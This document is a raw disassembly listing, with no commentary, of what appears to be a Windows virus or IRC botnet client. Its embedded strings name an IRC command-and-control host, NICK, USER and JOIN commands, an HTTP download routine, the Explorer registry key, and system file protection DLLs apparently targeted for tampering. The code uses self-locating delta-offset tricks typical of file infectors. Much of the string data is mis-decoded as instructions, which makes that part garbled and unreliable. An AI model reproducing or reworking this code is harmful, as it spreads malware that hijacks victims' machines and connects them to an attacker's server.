		db	65h
		popa
		jz	short near ptr loc_314386B2+3
		push	esp
		outsd
		outsd
		insb
		push	33706C65h
		xor	dl, [ebx+6Eh]
		popa
		jo	short near ptr loc_314386D1+1
		push	4500746Fh
		js	short loc_314386CF
		jz	short near ptr loc_314386BB+1
		push	64616572h
		add	[esi+69h], al
		insb
		db	65h
		push	esp
		imul	ebp, [ebp+65h],	79536F54h
		jnb	short loc_314386F0
		db	65h
		insd
		push	esp
		imul	ebp, [ebp+65h],	65724600h
		db	65h
		dec	esp
		imul	esp, [edx+72h],	797261h
		inc	edi
		db	65h
		jz	short near ptr loc_314386D3+6


loc_31438693:				; CODE XREF: sub_3143859F+8Fj
		imul	ebp, [ebp+41h],	69727474h


loc_3143869B:				; CODE XREF: sub_3143859F+95j
		bound	esi, [ebp+74h]
		db	65h
		jnb	short loc_314386E2
		add	[edi+65h], al
		jz	short near ptr loc_314386EB+1


loc_314386A6:				; CODE XREF: sub_3143859F+A2j
		imul	ebp, [ebp+53h],	657A69h
		inc	edi
		db	65h
		jz	short loc_314386F8


loc_314386B2:				; CODE XREF: sub_3143859F+AFj
		imul	ebp, [ebp+54h],	656D69h
		inc	edi


loc_314386BB:				; CODE XREF: sub_3143859F+C7j
		db	65h
		jz	short near ptr loc_3143870A+1
		outsd
		db	64h
		jnz	short near ptr loc_31438729+5
		db	65h
		dec	eax
		popa
		outsb
		db	64h
		insb
		db	65h
		inc	ecx
		add	[edi+65h], al
		jz	short near ptr loc_3143871D+6


loc_314386CF:				; CODE XREF: sub_3143859F+C5j
		db	65h
		insd


loc_314386D1:				; CODE XREF: sub_3143859F+BEj
		jo	short near ptr loc_31438717+2


loc_314386D3:				; CODE XREF: sub_3143859F+F1j
		imul	ebp, [ebp+4Eh],	41656D61h
		add	[edi+65h], al
		jz	short near ptr loc_31438731+3
		db	65h
		insd


loc_314386E2:				; CODE XREF: sub_3143859F+FFj
		jo	short near ptr loc_31438731+3
		popa
		jz	short near ptr loc_3143874E+1
		inc	ecx
		add	[edi+65h], al


loc_314386EB:				; CODE XREF: sub_3143859F+105j
		jz	short loc_31438743
		db	65h
		jb	short near ptr loc_31438762+1


loc_314386F0:				; CODE XREF: sub_3143859F+DBj
		imul	ebp, [edi+6Eh],	74654700h
		push	esi


loc_314386F8:				; CODE XREF: sub_3143859F+110j
		db	65h
		jb	short near ptr loc_3143876C+2
		imul	ebp, [edi+6Eh],	417845h
		inc	edi
		db	65h
		jz	short near ptr loc_3143875B+1
		outsd
		insb
		jnz	short near ptr loc_31438771+6


loc_3143870A:				; CODE XREF: sub_3143859F:loc_314386BBj
		db	65h
		dec	ecx
		outsb
		outsw
		jb	short near ptr loc_3143877C+2
		popa
		jz	short near ptr loc_3143877C+1
		outsd
		outsb
		inc	ecx


loc_31438717:				; CODE XREF: sub_3143859F:loc_314386D1j
		add	[edi+ebp*2+61h], cl
		db	64h
		dec	esp


loc_3143871D:				; CODE XREF: sub_3143859F+12Ej
		imul	esp, [edx+72h],	41797261h
		add	[ebp+61h], cl
		jo	short loc_3143877F


loc_31438729:				; CODE XREF: sub_3143859F+120j
		imul	esp, [ebp+77h],	6946664Fh
		insb


loc_31438731:				; CODE XREF: sub_3143859F+13Fj
					; sub_3143859F:loc_314386E2j
		add	gs:[edi+70h], cl
		outs	dx, byte ptr gs:[esi]
		inc	esi
		imul	ebp, [ebp+4Dh],	69707061h
		outsb
		db	67h
		inc	ecx


loc_31438743:				; CODE XREF: sub_3143859F:loc_314386EBj
		add	[edi+70h], cl
		outs	dx, byte ptr gs:[esi]
		push	eax
		jb	short near ptr loc_314387B9+1
		arpl	[ebp+73h], sp


loc_3143874E:				; CODE XREF: sub_3143859F+146j
		jnb	short $+2
		push	eax
		jb	short loc_314387C2
		arpl	[ebp+73h], sp
		jnb	short near ptr loc_31438784+7
		xor	al, [esi+69h]


loc_3143875B:				; CODE XREF: sub_3143859F+164j
		jb	short near ptr loc_314387CA+6
		jz	short $+2
		push	eax
		jb	short near ptr loc_314387CA+7


loc_31438762:				; CODE XREF: sub_3143859F+14Ej
		arpl	[ebp+73h], sp
		jnb	short near ptr loc_31438799+1
		xor	cl, [esi+65h]
		js	short near ptr loc_314387DC+4


loc_3143876C:				; CODE XREF: sub_3143859F:loc_314386F8j
		add	[ebx+65h], dl
		jz	short near ptr loc_314387B5+2


loc_31438771:				; CODE XREF: sub_3143859F+169j
		imul	ebp, [ebp+41h],	69727474h
		bound	esi, [ebp+74h]


loc_3143877C:				; CODE XREF: sub_3143859F+173j
					; sub_3143859F+170j
		db	65h
		jnb	short loc_314387C0


loc_3143877F:				; CODE XREF: sub_3143859F+188j
		add	[ebx+65h], dl
		jz	short loc_314387CA


loc_31438784:				; CODE XREF: sub_3143859F+1B7j
		imul	ebp, [ebp+54h],	656D69h
		push	ebx
		insb
		db	65h, 65h
		jo	short $+4
		push	ebx
		jns	short loc_31438808
		jz	short loc_314387FC
		insd
		push	esp


loc_31438799:				; CODE XREF: sub_3143859F+1C6j
		imul	ebp, [ebp+65h],	69466F54h
		insb
		db	65h
		push	esp
		imul	ebp, [ebp+65h],	6D6E5500h
		popa
		jo	short loc_31438803
		imul	esp, [ebp+77h],	6946664Fh
		insb


loc_314387B5:				; CODE XREF: sub_3143859F+1D0j
		add	gs:[esi+69h], dl


loc_314387B9:				; CODE XREF: sub_3143859F+1AAj
		jb	short near ptr loc_3143882E+1
		jnz	short loc_3143881E
		insb
		inc	ecx
		insb


loc_314387C0:				; CODE XREF: sub_3143859F:loc_3143877Cj
		insb
		outsd


loc_314387C2:				; CODE XREF: sub_3143859F+1B2j
		arpl	[eax], ax
		push	edi
		jb	short loc_31438830
		jz	short loc_3143882E
		inc	esi


loc_314387CA:				; CODE XREF: sub_3143859F+1E3j
					; sub_3143859F:loc_3143875Bj ...
		imul	ebp, [ebp+0], 6441744Eh
		push	75h
		jnb	short loc_3143884A
		push	eax
		jb	short near ptr loc_3143883F+3
		jbe	short near ptr loc_3143883F+5
		insb


loc_314387DC:				; CODE XREF: sub_3143859F+1CBj
		db	65h, 67h, 65h
		jnb	near ptr 8835h
		outsd
		imul	esp, [ebp+6Eh],	0
		dec	esi
		jz	short near ptr loc_3143882B+1
		jb	short near ptr loc_3143884F+1
		popa
		jz	short loc_31438853
		inc	esi
		imul	ebp, [ebp+0], 7243744Eh
		db	65h
		popa
		jz	short loc_31438860
		push	eax


loc_314387FC:				; CODE XREF: sub_3143859F+1F6j
		jb	short loc_3143886D
		arpl	[ebp+73h], sp
		jnb	short $+2


loc_31438803:				; CODE XREF: sub_3143859F+20Cj
		dec	esi
		jz	short near ptr loc_31438846+3
		jb	short loc_3143886D


loc_31438808:				; CODE XREF: sub_3143859F+1F4j
		popa
		jz	short loc_31438870
		push	eax
		jb	short loc_3143887D
		arpl	[ebp+73h], sp
		jnb	short near ptr loc_31438853+5
		js	short $+2
		dec	esi
		jz	short loc_3143885B
		jb	short loc_3143887F
		popa
		jz	short near ptr loc_3143887F+3
		push	ebx


loc_3143881E:				; CODE XREF: sub_3143859F+21Cj
		arpl	gs:[ecx+ebp*2+6Fh], si
		outsb
		add	[esi+74h], cl
		inc	ebx
		jb	short near ptr loc_3143888E+1
		popa


loc_3143882B:				; CODE XREF: sub_3143859F+248j
		jz	short loc_31438892
		push	ebp


loc_3143882E:				; CODE XREF: sub_3143859F+228j
					; sub_3143859F:loc_314387B9j
		jnb	short near ptr loc_31438894+1


loc_31438830:				; CODE XREF: sub_3143859F+226j
		jb	short near ptr loc_3143887F+3
		jb	short loc_314388A3
		arpl	[ebp+73h], sp
		jnb	short $+2
		dec	esi
		jz	short loc_31438889
		popa
		jo	short near ptr loc_31438894+1


loc_3143883F:				; CODE XREF: sub_3143859F+238j
					; sub_3143859F+23Aj
		imul	esp, [ebp+77h],	6553664Fh


loc_31438846:				; CODE XREF: sub_3143859F+265j
		arpl	[ecx+ebp*2+6Fh], si


loc_3143884A:				; CODE XREF: sub_3143859F+235j
		outsb
		add	[esi+74h], cl
		dec	edi


loc_3143884F:				; CODE XREF: sub_3143859F+24Aj
		jo	short loc_314388B6
		outsb
		inc	esi


loc_31438853:				; CODE XREF: sub_3143859F+24Dj
					; sub_3143859F+272j
		imul	ebp, [ebp+0], 704F744Eh


loc_3143885B:				; CODE XREF: sub_3143859F+277j
		outs	dx, byte ptr gs:[esi]
		push	eax
		jb	short loc_314388CF


loc_31438860:				; CODE XREF: sub_3143859F+25Aj
		arpl	[ebp+73h], sp
		jnb	short loc_314388B9
		outsd
		imul	esp, [ebp+6Eh],	0
		dec	esi
		jz	short near ptr loc_314388BB+1


loc_3143886D:				; CODE XREF: sub_3143859F:loc_314387FCj
					; sub_3143859F+267j
		jo	short near ptr loc_314388D3+1
		outsb


loc_31438870:				; CODE XREF: sub_3143859F+26Aj
		push	ebx
		arpl	gs:[ecx+ebp*2+6Fh], si
		outsb
		add	[esi+74h], cl
		push	eax
		jb	short near ptr loc_314388EB+1


loc_3143887D:				; CODE XREF: sub_3143859F+26Dj
		jz	short near ptr loc_314388E3+1


loc_3143887F:				; CODE XREF: sub_3143859F+279j
					; sub_3143859F+27Cj ...
		arpl	[esi+edx*2+69h], si
		jb	short loc_314388F9
		jnz	short near ptr loc_314388E7+1
		insb
		dec	ebp


loc_31438889:				; CODE XREF: sub_3143859F+29Bj
		db	65h
		insd
		outsd
		jb	short near ptr loc_31438904+3


loc_3143888E:				; CODE XREF: sub_3143859F+289j
		add	[esi+74h], cl
		push	ecx


loc_31438892:				; CODE XREF: sub_3143859F:loc_3143882Bj
		jnz	short loc_314388F9


loc_31438894:				; CODE XREF: sub_3143859F:loc_3143882Ej
					; sub_3143859F+29Ej
		jb	short near ptr loc_3143890E+1
		dec	ecx
		outsb
		outsw
		jb	short near ptr loc_31438908+1
		popa
		jz	short loc_31438908
		outsd
		outsb
		push	esp
		outsd


loc_314388A3:				; CODE XREF: sub_3143859F+293j
		imul	esp, [ebp+6Eh],	0
		dec	esi
		jz	short near ptr loc_314388FF+2
		jb	short loc_31438915
		jz	short near ptr loc_31438912+1
		push	esi
		imul	esi, [edx+74h],	4D6C6175h


loc_314388B6:				; CODE XREF: sub_3143859F:loc_3143884Fj
		db	65h
		insd
		outsd


loc_314388B9:				; CODE XREF: sub_3143859F+2C4j
		jb	short loc_31438934


loc_314388BB:				; CODE XREF: sub_3143859F+2CCj
		add	[edx+74h], dl
		insb
		push	ebp
		outsb
		imul	esp, [ebx+6Fh],	74536564h
		jb	short near ptr loc_31438931+2
		outsb
		db	67h
		push	esp
		outsd
		inc	ecx


loc_314388CF:				; CODE XREF: sub_3143859F+2BFj
		outsb
		jnb	short near ptr loc_3143893A+1
		push	ebx


loc_314388D3:				; CODE XREF: sub_3143859F:loc_3143886Dj
		jz	short loc_31438947
		imul	ebp, [esi+67h],	41535700h
		push	ebx
		jz	short loc_31438940
		jb	short loc_31438955
		jnz	short near ptr loc_31438952+1


loc_314388E3:				; CODE XREF: sub_3143859F:loc_3143887Dj
		add	[ebx+6Ch], ah
		outsd


loc_314388E7:				; CODE XREF: sub_3143859F+2E6j
		jnb	short loc_3143894E
		jnb	short near ptr loc_31438959+1


loc_314388EB:				; CODE XREF: sub_3143859F+2DCj
		arpl	[ebx+65h], bp
		jz	short $+2
		arpl	[edi+6Eh], bp
		outsb
		arpl	gs:[eax+eax+67h], si


loc_314388F9:				; CODE XREF: sub_3143859F+2E4j
					; sub_3143859F:loc_31438892j
		db	65h
		jz	short near ptr loc_31438963+1
		outsd
		jnb	short near ptr loc_31438971+2


loc_314388FF:				; CODE XREF: sub_3143859F+309j
		bound	edi, [ecx+6Eh]
		popa
		insd


loc_31438904:				; CODE XREF: sub_3143859F+2EDj
		add	gs:[edx+65h], dh


loc_31438908:				; CODE XREF: sub_3143859F+2FEj
					; sub_3143859F+2FBj
		arpl	[esi+0], si
		jnb	short near ptr loc_31438971+1
		outsb


loc_3143890E:				; CODE XREF: sub_3143859F:loc_31438894j
		add	fs:[ebx+6Fh], dh


loc_31438912:				; CODE XREF: sub_3143859F+30Dj
		arpl	[ebx+65h], bp


loc_31438915:				; CODE XREF: sub_3143859F+30Bj
		jz	short $+2
		dec	ecx
		outsb
		jz	short loc_31438980
		jb	short loc_3143898B
		db	65h
		jz	short loc_31438963
		insb
		outsd
		jnb	short near ptr loc_31438988+1
		dec	eax
		popa
		outsb
		db	64h
		insb
		add	gs:[ecx+6Eh], cl
		jz	short loc_31438994
		jb	short near ptr loc_3143899E+1


loc_31438931:				; CODE XREF: sub_3143859F+329j
		db	65h
		jz	short loc_3143897B


loc_31438934:				; CODE XREF: sub_3143859F:loc_314388B9j
		db	65h
		jz	short loc_3143897A
		outsd
		outsb
		outsb


loc_3143893A:				; CODE XREF: sub_3143859F+331j
		arpl	gs:[ebp+64h], si
		push	ebx


loc_31438940:				; CODE XREF: sub_3143859F+33Ej
		jz	short near ptr loc_314389A2+1
		jz	short loc_314389A9
		add	[ecx+6Eh], cl


loc_31438947:				; CODE XREF: sub_3143859F:loc_314388D3j
		jz	short near ptr loc_314389AC+2
		jb	short loc_314389B9
		db	65h
		jz	short near ptr loc_3143899B+2


loc_3143894E:				; CODE XREF: sub_3143859F:loc_314388E7j
		jo	short loc_314389B5
		outsb
		inc	ecx


loc_31438952:				; CODE XREF: sub_3143859F+342j
		add	[ecx+6Eh], cl


loc_31438955:				; CODE XREF: sub_3143859F+340j
		jz	short near ptr loc_314389BB+1
		jb	short loc_314389C7


loc_31438959:				; CODE XREF: sub_3143859F+34Aj
		db	65h
		jz	short near ptr loc_314389AA+1
		jo	short loc_314389C3
		outsb
		push	ebp
		jb	short near ptr loc_314389CC+2
		inc	ecx


loc_31438963:				; CODE XREF: sub_3143859F+37Ej
					; sub_3143859F:loc_314388F9j
		add	[ecx+6Eh], cl
		jz	short near ptr loc_314389CC+1
		jb	short loc_314389D8
		db	65h
		jz	short near ptr loc_314389BE+1
		db	65h
		popa
		db	64h
		inc	esi


loc_31438971:				; CODE XREF: sub_3143859F+36Cj
					; sub_3143859F+35Ej
		imul	ebp, [ebp+0], 41564441h
		push	eax


loc_3143897A:				; CODE XREF: sub_3143859F:loc_31438934j
		dec	ecx


loc_3143897B:				; CODE XREF: sub_3143859F:loc_31438931j
		xor	esi, [edx]
		db	2Eh
		inc	esp
		dec	esp


loc_31438980:				; CODE XREF: sub_3143859F+37Aj
		dec	esp
		add	[edx+65h], dl
		db	67h
		inc	ebx
		insb
		outsd


loc_31438988:				; CODE XREF: sub_3143859F+383j
		jnb	short near ptr loc_314389ED+2
		dec	ebx


loc_3143898B:				; CODE XREF: sub_3143859F+37Cj
		db	65h
		jns	short $+3
		push	edx
		db	65h, 67h
		dec	edi
		jo	short loc_314389F9


loc_31438994:				; CODE XREF: sub_3143859F+38Ej
		outsb
		dec	ebx
		db	65h
		jns	short near ptr loc_314389DC+2
		js	short loc_314389DC


loc_3143899B:				; CODE XREF: sub_3143859F+3ACj
		add	[edx+65h], dl


loc_3143899E:				; CODE XREF: sub_3143859F+390j
		db	67h
		push	ecx
		jnz	short loc_31438A07


loc_314389A2:				; CODE XREF: sub_3143859F:loc_31438940j
		jb	short near ptr loc_31438A1C+1
		push	esi
		popa
		insb
		jnz	short near ptr loc_31438A0D+1


loc_314389A9:				; CODE XREF: sub_3143859F+3A3j
		inc	ebp


loc_314389AA:				; CODE XREF: sub_3143859F:loc_31438959j
		js	short loc_314389ED


loc_314389AC:				; CODE XREF: sub_3143859F:loc_31438947j
		add	[edx+65h], dl
		db	67h
		push	ebx
		db	65h
		jz	short loc_31438A0A
		popa


loc_314389B5:				; CODE XREF: sub_3143859F:loc_3143894Ej
		insb
		jnz	short near ptr loc_31438A1C+1
		inc	ebp


loc_314389B9:				; CODE XREF: sub_3143859F+3AAj
		js	short loc_314389FC


loc_314389BB:				; CODE XREF: sub_3143859F:loc_31438955j
		add	[esi+33h], dl


loc_314389BE:				; CODE XREF: sub_3143859F+3CBj
		imul	byte ptr [edx+2]
		push	esi
		push	esi


loc_314389C3:				; CODE XREF: sub_3143859F+3BDj
		mov	edx, esp
		push	1


loc_314389C7:				; CODE XREF: sub_3143859F+3B8j
		push	edx
		push	dword ptr [edx+18h]
		push	esi


loc_314389CC:				; CODE XREF: sub_3143859F+3C7j
					; sub_3143859F+3C1j
		call	dword ptr [ebp+10427Ch]
		mov	eax, esp
		push	esi
		push	esi
		push	esi
		push	eax


loc_314389D8:				; CODE XREF: sub_3143859F+3C9j
		push	esi
		push	dword ptr [eax+18h]


loc_314389DC:				; CODE XREF: sub_3143859F+3FAj
					; sub_3143859F+3F7j
		call	dword ptr [ebp+103EEAh]
		add	esp, 10h
		pop	esi
		retn	8
; END OF FUNCTION CHUNK	FOR sub_3143859F
; ---------------------------------------------------------------------------
		db  8Dh	; 
		db  49h	; I
		db 0FBh	; 
		db  2Bh	; +
; ---------------------------------------------------------------------------


loc_314389ED:				; CODE XREF: sub_3143859F:loc_314389AAj
					; sub_3143859F:loc_31438988j
		enter	6851h, 0
; ---------------------------------------------------------------------------
		db    0
		db    0
		db 0E8h	; 
		db  8Dh	; 
		db  4Ch	; L
		db  24h	; $
		db    3
		db  6Ah	; j
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_3143859F


loc_314389F9:				; CODE XREF: sub_3143859F+3F3j
		add	[edx+5], ch


loc_314389FC:				; CODE XREF: sub_3143859F:loc_314389B9j
		push	ecx
		push	eax
		push	ebx
		push	5
		mov	ecx, esp
		push	eax
		mov	edx, esp
		push	eax


loc_31438A07:				; CODE XREF: sub_3143859F+401j
		push	esp
		push	40h


loc_31438A0A:				; CODE XREF: sub_3143859F+412j
		push	ecx
		push	edx
		push	ebx


loc_31438A0D:				; CODE XREF: sub_3143859F+408j
		call	dword ptr [ebp+103F12h]
		add	esp, 0Ch
		call	dword ptr [ebp+103F1Ah]


loc_31438A1C:				; CODE XREF: sub_3143859F:loc_314389A2j
					; sub_3143859F+417j
		add	esp, 8
		retn
; END OF FUNCTION CHUNK	FOR sub_3143859F
; ---------------------------------------------------------------------------
		db  8Dh	; 
		db  95h	; 
		db  20h
		db  3Eh	; >
		db  10h
		db    0
		db  33h	; 3
		db 0C9h	; 
		db  6Ah	; j
		db    0
		db  52h	; R
		db  68h	; h
		db  30h	; 0
		db    0
		db  32h	; 2
		db    0
		db  8Bh	; 
		db 0C4h	; 
		db  51h	; Q
		db  51h	; Q
		db  6Ah	; j
		db  40h	; @
		db  50h	; P
		db  51h	; Q
		db  6Ah	; j
		db  18h
		db  83h	; 
		db 0C0h	; 
		db    8
		db  54h	; T
		db  6Ah	; j
		db  0Eh
		db  50h	; P
		db 0FFh
		db  95h	; 
		db  0Eh
		db  3Fh	; ?
		db  10h
		db    0
		db  83h	; 
		db 0C4h	; 
		db  20h
		db  33h	; 3
		db 0D2h	; 
		db  85h	; 
		db 0C0h	; 
		db  0Fh
		db  99h	; 
		db 0C2h	; 
		db 0F7h	; 
		db 0DAh	; 
		db  58h	; X
		db  23h	; #
		db 0C2h	; 
		db 0C3h	; 
		db  57h	; W
		db  33h	; 3
		db 0FFh
		db 0E8h	; 
		db 0C1h	; 
		db 0FFh
		db 0FFh
		db 0FFh
		db  0Fh
		db  84h	; 
		db 0A5h	; 
		db    0
		db    0
		db    0
		db  50h	; P
		db  68h	; h
		db  18h
		db  73h	; s
		db    0
		db    0
		db  8Bh	; 
		db 0D4h	; 
		db  6Ah	; j
		db    0
		db  8Bh	; 
		db 0CCh	; 
		db  6Ah	; j
		db  40h	; @
		db  68h	; h
		db    0
		db    0
		db  10h
		db    0
		db  6Ah	; j
		db    2
		db  52h	; R
		db  6Ah	; j
		db    0
		db  68h	; h
		db  18h
		db  73h	; s
		db    0
		db    0
		db  6Ah	; j
		db    0
		db  51h	; Q
		db  53h	; S
		db  50h	; P
		db 0FFh
		db  95h	; 
		db    2
		db  3Fh	; ?
		db  10h
		db    0
		db  5Fh	; _
		db  59h	; Y
		db 0FFh
		db  95h	; 
		db  52h	; R
		db  3Eh	; >
		db  10h
		db    0
		db  85h	; 
		db 0FFh
		db  74h	; t
		db  71h	; q
		db  8Bh	; 
		db  8Dh	; 
		db  80h	; 
		db  15h
		db  10h
		db    0
		db 0E3h	; 
		db  0Ch
		db  8Dh	; 
		db  95h	; 
		db    0
		db  10h
		db  10h
		db    0
		db    3
		db 0D1h	; 
		db  57h	; W
		db  53h	; S
		db 0FFh
		db 0D2h	; 
		db  8Bh	; 
		db  85h	; 
		db 0EEh	; 
		db  3Eh	; >
		db  10h
		db    0
		db  8Dh	; 
		db  8Fh	; 
		db    6
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db  2Bh	; +
		db 0FFh
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db  85h	; 
		db    6
		db  3Fh	; ?
		db  10h
		db    0
		db  8Dh	; 
		db  8Fh	; 
		db  53h	; S
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db  1Ah
		db 0FFh
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db  85h	; 
		db 0F2h	; 
		db  3Eh	; >
		db  10h
		db    0
		db  8Dh	; 
		db  8Fh	; 
		db  5Ah	; Z
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db    9
		db 0FFh
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db  85h	; 
		db 0F6h	; 
		db  3Eh	; >
		db  10h
		db    0
		db  85h	; 
		db 0C0h	; 
		db  74h	; t
		db  20h
		db  8Dh	; 
		db  8Fh	; 
		db  67h	; g
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db 0F4h	; 
		db 0FEh	; 
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db  85h	; 
		db 0FEh	; 
		db  3Eh	; >
		db  10h
		db    0
		db  85h	; 
		db 0C0h	; 
		db  74h	; t
		db  0Bh
		db  8Dh	; 
		db  8Fh	; 
		db  74h	; t
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db 0DFh	; 
		db 0FEh	; 
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db 0C7h	; 
		db  5Fh	; _
		db 0C3h	; 
		db  55h	; U
		db 0E8h	; 
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
		pop	ebp
		sub	ebp, 101B14h
		xor	ecx, ecx
		lea	eax, [ebp+101E9Fh]
		push	ecx
		push	esp
		push	ecx
		push	ecx
		push	eax
		push	ecx
		push	ecx
		call	dword ptr [ebp+103E7Eh]
		xchg	eax, [esp]
		call	dword ptr [ebp+103E52h]
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------
		db 55h,	0E8h, 0
		dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh,	52500010h
		dd 2420CDh, 0C483002Ah,	85C7660Ch, 101B54h, 85C720CDh
		dd 101B56h, 2A0024h, 1A6AC35Dh,	9E858h,	428D0000h, 0C9FEAA61h
		dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch
		dd 55C3E2F7h, 0E8h, 0ED815D00h,	101B9Dh, 3F709D8Bh, 7C830010h
		dd 0F000824h, 0B984h, 8EC8100h,	54000002h, 10468h, 0A695FF00h
		dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
		dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
		dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h
		dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh
		dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh
		dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h
		dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
		dd 3E7695FFh, 0C4810010h, 208h,	82474FFh, 3F3E95FFh, 0FF530010h
		dd 103F3E95h, 4C25D00h,	0A3E8000h, 8B460175h, 10157C8Dh
		dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh,	11F880Fh
		dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
		dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
		dd 6A51CEh, 0FF535651h,	103F3695h, 0C13B5900h, 0DF850Fh
		dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h
		dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
		dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh,	3C000000h
		dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
		dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
		dd 68752F2Fh, 0FF47C6h,	10BA310Fh, 0F7000027h, 95FF52E2h
		dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
		dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h
		dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 958D0010h
		dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh
		dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h
		dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh,	8D3C5003h
		dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
		dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
		dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h,	868D8B00h
		dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
		dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
		dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
		dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
		dd 2007473h, 7F500000h,	70010000h, 69786F72h, 72692E6Dh
		dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 68797173h
		dd 76717067h, 4553550Ah, 4A662052h, 204E494Fh, 72697626h
		dd 550A7574h, 0E8h, 0ED815D00h,	101EA5h, 156F85C6h, 0FF000010h
		dd 103EAA95h, 1FE8C100h, 1E6A3C74h, 3E62B58Bh, 0AC590010h
		dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh,	2768B00h
		dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh
		dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
		dd 8E84475h, 53000000h,	442E4346h, 0FF004C4Ch, 103EB695h
		dd 74C00B00h, 26A930Dh,	5E95FF53h, 0FF00103Eh, 97E893D0h
		dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EB695h
		dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh,	8DC93300h
		dd 10431485h, 51515100h, 51515051h, 0B295FF51h,	0E800103Eh
		dd 0Bh,	52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h
		dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh
		dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh
		dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh
		dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h
		dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h
		dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh,	66A5200h
		dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h
		dd 103F5295h, 7385C600h, 1041h,	0CE8h, 4F535700h, 32334B43h
		dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h
		dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h,	0Ch, 494E4957h
		dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh
		dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h
		dd 0BD83FFFFh, 103F42h,	10840F00h, 81000002h, 190ECh, 1685400h
		dd 0FF000001h, 103F2295h, 90C48100h, 50000001h,	6AD48Bh
		dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h
		dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h
		dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
		dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h
		dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h
		dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh
		dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh,	95FF5424h
		dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh
		dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h
		dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h
		dd 4A12014Ah, 34A1202h,	824440Bh, 0C10FE180h, 0B5108E0h
		dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h
		dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
		dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h
		dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h,	5, 0A642526h
